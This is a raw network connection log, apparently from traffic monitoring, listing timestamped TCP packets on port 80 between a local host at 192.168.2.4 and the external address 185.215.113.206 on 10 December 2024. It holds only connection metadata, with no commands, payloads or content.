Dec 10, 2024 00:42:06.706617117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.706662893 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.706721067 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.706759930 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.708633900 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.708692074 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.708722115 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.708765030 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.710660934 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.710724115 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.710832119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.710871935 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.712681055 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.712747097 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.712786913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.712836027 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.714710951 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.714761019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.714793921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.714837074 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.716718912 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.716768980 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.716819048 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.716866016 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.718714952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.718770027 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.718837976 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.718882084 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.760771036 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.760792971 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.760858059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.760869026 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.761301041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.761343002 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.761408091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.761455059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.763143063 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.763200998 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.763226032 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.763268948 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.764986038 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.765033960 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.765127897 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.765172005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.766782999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.766835928 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.766865969 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.766911983 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.768543959 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.768589020 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.768688917 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.768732071 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.770318985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.770363092 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.770386934 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.770437002 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.772027016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.772075891 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.772123098 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.772164106 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.773721933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.773797035 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.773828030 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.773866892 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.775557995 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.775615931 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.776499033 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.776550055 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.777017117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.777087927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.777128935 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.777170897 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.778615952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.778672934 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.778740883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.778784990 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.780205965 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.780258894 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.780263901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.780297995 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.781763077 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.781817913 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.781841993 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.781888008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.783299923 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.783354044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.783401966 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.783447981 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.788409948 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.788420916 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.788430929 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.788441896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.788453102 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.788464069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.788496971 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.788566113 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.789268970 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.789313078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.789344072 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.789381027 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.790703058 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.790747881 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.790843964 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.790893078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.792109966 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.792150974 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.792224884 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.792273998 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.793535948 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.793581963 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.793688059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.793728113 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.795104980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.795151949 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.824696064 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.824804068 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.824866056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.824912071 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.825231075 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.825242043 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.825265884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.825294018 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.826086998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.826132059 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.826288939 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.826333046 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.827377081 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.827425003 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.827523947 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.827565908 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.828506947 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.828557968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.828685999 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.828731060 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.829978943 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.830041885 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.830154896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.830202103 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.830853939 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.830907106 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.831185102 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.831219912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.832154036 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.832171917 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.832197905 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.832237959 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.833338976 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.833384991 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.833548069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.833589077 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.834557056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.834600925 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.834721088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.834769011 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.835756063 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.835802078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.835912943 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.835958958 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.836819887 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.836868048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.837116003 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.837160110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.838035107 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.838080883 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.838216066 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.838258028 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.839167118 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.839214087 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.839378119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.839426994 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.840116024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.840135098 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.840146065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.840158939 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.840169907 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.840204954 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.840251923 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.840733051 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.840780973 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.840832949 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.840874910 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.841912985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.841954947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.842035055 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.842087984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.843044043 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.843092918 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.843154907 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.843197107 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.844208002 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.844252110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.844331980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.844373941 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.845314026 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.845360041 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.893737078 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.893807888 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.893904924 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.893945932 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.894423008 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.894434929 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.894464970 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.894486904 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.895276070 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.895333052 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.895422935 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.895458937 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.896562099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.896574020 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.896603107 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.896615028 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.897681952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.897692919 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.897716045 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.897733927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.898758888 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.898768902 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.898792982 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.898813009 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.899878979 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.899892092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.899925947 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.899941921 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.901032925 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.901077986 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.901196957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.901252985 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.902160883 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.902204990 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.902311087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.902354956 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.903351068 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.903362036 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.903393984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.903419971 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.904563904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.904607058 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.955156088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.955214977 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.955331087 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.955369949 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.955852985 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.955864906 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.955895901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.955909014 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.956968069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.956978083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.957000017 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.957026005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.958064079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.958075047 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.958107948 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.958134890 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.959320068 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.959331036 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.959367037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.959397078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.960448980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.960500956 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.960578918 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.960623980 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.961584091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.961630106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.961632967 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.961663008 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.962729931 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.962779999 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.962920904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.962969065 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.963735104 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.963821888 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.963917971 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.963962078 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.964833021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.964894056 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.964983940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.965033054 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.965984106 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.966041088 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.966136932 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.966175079 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.967117071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.967168093 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.967293024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.967355013 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.968069077 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.968120098 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.968230963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.968281984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.969222069 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.969268084 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.969374895 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.969417095 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.970175028 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.970215082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.970340014 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.970390081 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.971183062 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.971229076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.971497059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.971560001 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.972291946 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.972343922 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.972445011 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.972551107 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.973309994 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.973356962 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.973479986 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.973520041 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.974303961 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.974313974 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.974324942 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.974334955 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.974347115 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.974390984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.974406004 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.974452972 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.974534035 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.974586010 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.975414991 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.975461006 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.975487947 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.975529909 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.976514101 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.976552010 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.976674080 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.976721048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.977447987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.977498055 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.014955044 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.015006065 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.015091896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.015141010 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.015477896 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.015522003 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.015595913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.015645027 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.016488075 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:07.016535044 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:07.016607046 CET	80	49730	185.215.113.206	192.168.2.4
